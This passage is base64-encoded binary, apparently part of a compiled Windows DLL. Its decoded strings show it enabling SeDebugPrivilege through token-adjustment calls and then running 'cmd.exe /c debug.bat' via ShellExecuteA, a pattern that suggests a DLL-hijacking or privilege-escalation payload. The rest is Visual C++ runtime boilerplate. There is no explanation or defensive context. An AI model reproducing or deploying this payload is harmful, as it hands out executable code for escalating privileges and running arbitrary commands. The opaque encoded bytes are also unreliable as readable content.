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G0AYgBsAHkAIABkAHUAcgBpAG4AZwAgAG4AYQB0AGkAdgBlACAAYwBvAGQAZQAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgAKAFQAaABpAHMAIABpAG4AZABpAGMAYQB0AGUAcwAgAGEAIABiAHUAZwAgAGkAbgAgAHkAbwB1AHIAIABhAHAAcABsAGkAYwBhAHQAaQBvAG4ALgAgAEkAdAAgAGkAcwAgAG0AbwBzAHQAIABsAGkAawBlAGwAeQAgAHQAaABlACAAcgBlAHMAdQBsAHQAIABvAGYAIABjAGEAbABsAGkAbgBnACAAYQBuACAATQBTAEkATAAtAGMAbwBtAHAAaQBsAGUAZAAgACgALwBjAGwAcgApACAAZgB1AG4AYwB0AGkAbwBuACAAZgByAG8AbQAgAGEAIABuAGEAdABpAHYAZQAgAGMAbwBuAHMAdAByAHUAYwB0AG8AcgAgAG8AcgAgAGYAcgBvAG0AIABEAGwAbABNAGEAaQBuAC4ADQAKAAAAAABSADYAMAAzADIADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABsAG8AYwBhAGwAZQAgAGkAbgBmAG8AcgBtAGEAdABpAG8AbgANAAoAAAAAAFIANgAwADMAMQANAAoALQAgAEEAdAB0AGUAbQBwAHQAIAB0AG8AIABpAG4AaQB0AGkAYQBsAGkAegBlACAAdABoAGUAIABDAFIAVAAgAG0AbwByAGUAIAB0AGgAYQBuACAAbwBuAGMAZQAuAAoAVABoAGkAcwAgAGkAbgBkAGkAYwBhAHQAZQBzACAAYQAgAGIAdQBnACAAaQBuACAAeQBvAHUAcgAgAGEAcABwAGwAaQBjAGEAdABpAG8AbgAuAA0ACgAAAAAAUgA2ADAAMwAwAA0ACgAtACAAQwBSAFQAIABuAG8AdAAgAGkAbgBpAHQAaQBhAGwAaQB6AGUAZAANAAoAAAAAAFIANgAwADIAOAANAAoALQAgAHUAbgBhAGIAbABlACAAdABvACAAaQBuAGkAdABpAGEAbABpAHoAZQAgAGgAZQBhAHAADQAKAAAAAAAAAAAAUgA2ADAAMgA3AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAbABvAHcAaQBvACAAaQBuAGkAdABpAGEAbABpAHoAYQB0AGkAbwBuAA0ACgAAAAAAAAAAAFIANgAwADIANgANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAHMAdABkAGkAbwAgAGkAbgBpAHQAaQBhAGwAaQB6AGEAdABpAG8AbgANAAoAAAAAAAAAAABSADYAMAAyADUADQAKAC0AIABwAHUAcgBlACAAdgBpAHIAdAB1AGEAbAAgAGYAdQBuAGMAdABpAG8AbgAgAGMAYQBsAGwADQAKAAAAAAAAAFIANgAwADIANAANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAF8AbwBuAGUAeABpAHQALwBhAHQAZQB4AGkAdAAgAHQAYQBiAGwAZQANAAoAAAAAAAAAAABSADYAMAAxADkADQAKAC0AIAB1AG4AYQBiAGwAZQAgAHQAbwAgAG8AcABlAG4AIABjAG8AbgBzAG8AbABlACAAZABlAHYAaQBjAGUADQAKAAAAAAAAAAAAUgA2ADAAMQA4AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAGgAZQBhAHAAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA3AA0ACgAtACAAdQBuAGUAeABwAGUAYwB0AGUAZAAgAG0AdQBsAHQAaQB0AGgAcgBlAGEAZAAgAGwAbwBjAGsAIABlAHIAcgBvAHIADQAKAAAAAAAAAAAAUgA2ADAAMQA2AA0ACgAtACAAbgBvAHQAIABlAG4AbwB1AGcAaAAgAHMAcABhAGMAZQAgAGYAbwByACAAdABoAHIAZQBhAGQAIABkAGEAdABhAA0ACgAAAFIANgAwADEAMAANAAoALQAgAGEAYgBvAHIAdAAoACkAIABoAGEAcwAgAGIAZQBlAG4AIABjAGEAbABsAGUAZAANAAoAAAAAAFIANgAwADAAOQANAAoALQAgAG4AbwB0ACAAZQBuAG8AdQBnAGgAIABzAHAAYQBjAGUAIABmAG8AcgAgAGUAbgB2AGkAcgBvAG4AbQBlAG4AdAANAAoAAABSADYAMAAwADgADQAKAC0AIABuAG8AdAAgAGUAbgBvAHUAZwBoACAAcwBwAGEAYwBlACAAZgBvAHIAIABhAHIAZwB1AG0AZQBuAHQAcwANAAoAAAAAAAAAUgA2ADAAMAAyAA0ACgAtACAAZgBsAG8AYQB0AGkAbgBnACAAcABvAGkAbgB0ACAAcwB1AHAAcABvAHIAdAAgAG4AbwB0ACAAbABvAGEAZABlAGQADQAKAAAAAAAAAAAAAgAAACBuABAIAAAAyG0AEAkAAABwbQAQCgAAAChtABAQAAAA0GwAEBEAAABwbAAQEgAAAChsABATAAAA0GsAEBgAAABgawAQGQAAABBrABAaAAAAoGoAEBsAAAAwagAQHAAAAOBpABAeAAAAoGkAEB8AAADYaAAQIAAAAHBoABAhAAAAgGYAEHgAAABgZgAQeQAAAERmABB6AAAAKGYAEPwAAAAgZgAQ/wAAAABmABBNAGkAYwByAG8AcwBvAGYAdAAgAFYAaQBzAHUAYQBsACAAQwArACsAIABSAHUAbgB0AGkAbQBlACAATABpAGIAcgBhAHIAeQAAAAAACgAKAAAAAAAuAC4ALgAAADwAcAByAG8AZwByAGEAbQAgAG4AYQBtAGUAIAB1AG4AawBuAG8AdwBuAD4AAAAAAFIAdQBuAHQAaQBtAGUAIABFAHIAcgBvAHIAIQAKAAoAUAByAG8AZwByAGEAbQA6ACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgAKAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEAgQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACCAIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAAEAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAIAAgACAAIAAgACAAIAAgAGgAKAAoACgAKAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABIABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAIQAhACEAIQAhACEAIQAhACEAIQAEAAQABAAEAAQABAAEACBAYEBgQGBAYEBgQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAAQABAAEAAQABAAggGCAYIBggGCAYIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAEAAQABAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAFAAUABAAEAAQABAAEAAUABAAEAAQABAAEAAQAAEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEQAAEBAQEBAQEBAQEBAQEBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBEAACAQIBAgECAQIBAgECAQIBAQEAAAAAgIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6W1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/R2V0UHJvY2Vzc1dpbmRvd1N0YXRpb24AR2V0VXNlck9iamVjdEluZm9ybWF0aW9uVwAAAEdldExhc3RBY3RpdmVQb3B1cAAAR2V0QWN0aXZlV2luZG93AE1lc3NhZ2VCb3hXAFUAUwBFAFIAMwAyAC4ARABMAEwAAAAAACBDb21wbGV0ZSBPYmplY3QgTG9jYXRvcicAAAAgQ2xhc3MgSGllcmFyY2h5IERlc2NyaXB0b3InAAAAACBCYXNlIENsYXNzIEFycmF5JwAAIEJhc2UgQ2xhc3MgRGVzY3JpcHRvciBhdCAoACBUeXBlIERlc2NyaXB0b3InAAAAYGxvY2FsIHN0YXRpYyB0aHJlYWQgZ3VhcmQnAGBtYW5hZ2VkIHZlY3RvciBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAABgZHluYW1pYyBhdGV4aXQgZGVzdHJ1Y3RvciBmb3IgJwAAAABgZHluYW1pYyBpbml0aWFsaXplciBmb3IgJwAAYGVoIHZlY3RvciB2YmFzZSBjb3B5IGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBtYW5hZ2VkIHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgcGxhY2VtZW50IGRlbGV0ZVtdIGNsb3N1cmUnAAAAAGBwbGFjZW1lbnQgZGVsZXRlIGNsb3N1cmUnAABgb21uaSBjYWxsc2lnJwAAIGRlbGV0ZVtdAAAAIG5ld1tdAABgbG9jYWwgdmZ0YWJsZSBjb25zdHJ1Y3RvciBjbG9zdXJlJwBgbG9jYWwgdmZ0YWJsZScAYFJUVEkAAABgRUgAYHVkdCByZXR1cm5pbmcnAGBjb3B5IGNvbnN0cnVjdG9yIGNsb3N1cmUnAABgZWggdmVjdG9yIHZiYXNlIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAYGVoIHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwBgZWggdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmlydHVhbCBkaXNwbGFjZW1lbnQgbWFwJwAAYHZlY3RvciB2YmFzZSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAYHZlY3RvciBkZXN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAGBzY2FsYXIgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYGRlZmF1bHQgY29uc3RydWN0b3IgY2xvc3VyZScAAABgdmVjdG9yIGRlbGV0aW5nIGRlc3RydWN0b3InAAAAAGB2YmFzZSBkZXN0cnVjdG9yJwAAYHN0cmluZycAAAAAYGxvY2FsIHN0YXRpYyBndWFyZCcAAAAAYHR5cGVvZicAAAAAYHZjYWxsJwBgdmJ0YWJsZScAAABgdmZ0YWJsZScAAABePQAAfD0AACY9AAA8PD0APj49ACU9AAAvPQAALT0AACs9AAAqPQAAfHwAACYmAAB8AAAAXgAAAH4AAAAoKQAALAAAAD49AAA+AAAAPD0AADwAAAAlAAAALwAAAC0+KgAmAAAAKwAAAC0AAAAtLQAAKysAACoAAAAtPgAAb3BlcmF0b3IAAAAAW10AACE9AAA9PQAAIQAAADw8AAA+PgAAPQAAACBkZWxldGUAIG5ldwAAAABfX3VuYWxpZ25lZABfX3Jlc3RyaWN0AABfX3B0cjY0AF9fZWFiaQAAX19jbHJjYWxsAAAAX19mYXN0Y2FsbAAAX190aGlzY2FsbAAAX19zdGRjYWxsAAAAX19wYXNjYWwAAAAAX19jZGVjbABfX2Jhc2VkKAAAAAAMfgAQBH4AEPh9ABDsfQAQ4H0AENR9ABDIfQAQwH0AELh9ABCsfQAQoH0AEJ19ABCYfQAQkH0AEIx9ABCIfQAQhH0AEIB9ABB8fQAQeH0AEHR9ABBofQAQZH0AEGB9ABBcfQAQWH0AEFR9ABBQfQAQTH0AEEh9ABBEfQAQQH0AEDx9ABA4fQAQNH0AEDB9ABAsfQAQKH0AECR9ABAgfQAQHH0AEBh9ABAUfQAQEH0AEAx9ABAIfQAQBH0AEAB9ABD8fAAQ+HwAEPR8ABDwfAAQ7HwAEOB8ABDUfAAQzHwAEMB8ABCofAAQnHwAEIh8ABBofAAQSHwAECh8ABAIfAAQ6HsAEMR7ABCoewAQhHsAEGR7ABA8ewAQIHsAEBB7ABAMewAQBHsAEPR6ABDQegAQyHoAELx6ABCsegAQkHoAEHB6ABBIegAQIHoAEPh5ABDMeQAQsHkAEIx5ABBoeQAQPHkAEBB5ABD0eAAQnX0AEOB4ABDEeAAQsHgAEJB4ABB0eAAQAAAAAAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn8AU2VEZWJ1Z1ByaXZpbGVnZQAAAAAAAAAAL2MgZGVidWcuYmF0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAYzpcd2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlAG9wZW4AAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAEOCBABADAAAAAAAAAAAAAAAAAAAACJAAEAyBABAAAAAAAAAAAAIAAAAcgQAQKIEAEESBABAAAAAACJAAEAEAAAAAAAAA/////wAAAABAAAAADIEAECSQABAAAAAAAAAAAP////8AAAAAQAAAAGCBABAAAAAAAAAAAAEAAABwgQAQRIEAEAAAAAAAAAAAAAAAAAAAAAAkkAAQYIEAEAAAAAAAAAAAAAAAAJCQABCggQAQAAAAAAAAAAABAAAAsIEAELiBABAAAAAAkJAAEAAAAAAAAAAA/////wAAAABAAAAAoIEAEAAAAAAAAAAAAAAAAGAlAADwQwAAEFYAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/v///wAAAADY////AAAAAP7///8AAAAA2REAEAAAAAD+////AAAAANT///8AAAAA/v///zkTABBKEwAQAAAAAIUUABAAAAAATIIAEAIAAABYggAQdIIAEAAAAAAIkAAQAAAAAP////8AAAAADAAAALcUABAAAAAAJJAAEAAAAAD/////AAAAAAwAAADrKQAQ/v///wAAAADY////AAAAAP7///8AAAAAcxYAEP7///8AAAAAghYAEP7///8AAAAA2P///wAAAAD+////AAAAADUYABD+////AAAAAEEYABD+////AAAAAMD///8AAAAA/v///wAAAAC9HQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAGkrABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAADi4AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAB3MQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAD40ABAAAAAA/v///wAAAADM////AAAAAP7///8AAAAAlzgAEAAAAAD+////AAAAANj///8AAAAA/v///5I6ABCWOgAQAAAAAP7///8AAAAAwP///wAAAAD+////AAAAAH88ABAAAAAA/v///wAAAADY////AAAAAP7///+7PwAQzj8AEAAAAAD+////AAAAANT///8AAAAA/v///wAAAAAZRQAQfIQAAAAAAAAAAAAAloUAABBgAABshAAAAAAAAAAAAADohQAAAGAAAGSFAAAAAAAAAAAAAAaGAAD4YAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQhQAAuIUAAKSFAAAAAAAAiIUAAICFAABshQAAEoYAACiGAAA4hgAASoYAAF6GAAB6hgAAmIYAAKyGAAC8hgAAyIYAANaGAADkhgAA7oYAAAaHAAAahwAAKocAADqHAABShwAAZIcAAHCHAAB+hwAAkIcAAKCHAADIhwAA1ocAAOiHAAAAiAAAFogAADCIAABGiAAAYIgAAG6IAAB8iAAAlogAAKaIAAC8iAAA1ogAAOKIAAD0iAAADIkAACSJAAAwiQAAOokAAEaJAABYiQAAZokAAHaJAACCiQAAmIkAAKSJAACwiQAAwIkAANaJAADoiQAAAAAAAPaFAAAAAAAAwAFHZXRDdXJyZW50UHJvY2VzcwCyBFNsZWVwAFIAQ2xvc2VIYW5kbGUAS0VSTkVMMzIuZGxsAAD3AU9wZW5Qcm9jZXNzVG9rZW4AAJYBTG9va3VwUHJpdmlsZWdlVmFsdWVBAB8AQWRqdXN0VG9rZW5Qcml2aWxlZ2VzAEFEVkFQSTMyLmRsbAAAHgFTaGVsbEV4ZWN1dGVBAFNIRUxMMzIuZGxsAMUBR2V0Q3VycmVudFRocmVhZElkAADKAERlY29kZVBvaW50ZXIAhgFHZXRDb21tYW5kTGluZUEAwARUZXJtaW5hdGVQcm9jZXNzAADTBFVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAApQRTZXRVbmhhbmRsZWRFeGNlcHRpb25GaWx0ZXIAAANJc0RlYnVnZ2VyUHJlc2VudADqAEVuY29kZVBvaW50ZXIAxQRUbHNBbGxvYwAAxwRUbHNHZXRWYWx1ZQDIBFRsc1NldFZhbHVlAMYEVGxzRnJlZQDvAkludGVybG9ja2VkSW5jcmVtZW50AAAYAkdldE1vZHVsZUhhbmRsZVcAAHMEU2V0TGFzdEVycm9yAAACAkdldExhc3RFcnJvcgAA6wJJbnRlcmxvY2tlZERlY3JlbWVudAAARQJHZXRQcm9jQWRkcmVzcwAAzwJIZWFwRnJlZQAAGQFFeGl0UHJvY2VzcwBvBFNldEhhbmRsZUNvdW50AABkAkdldFN0ZEhhbmRsZQAA4w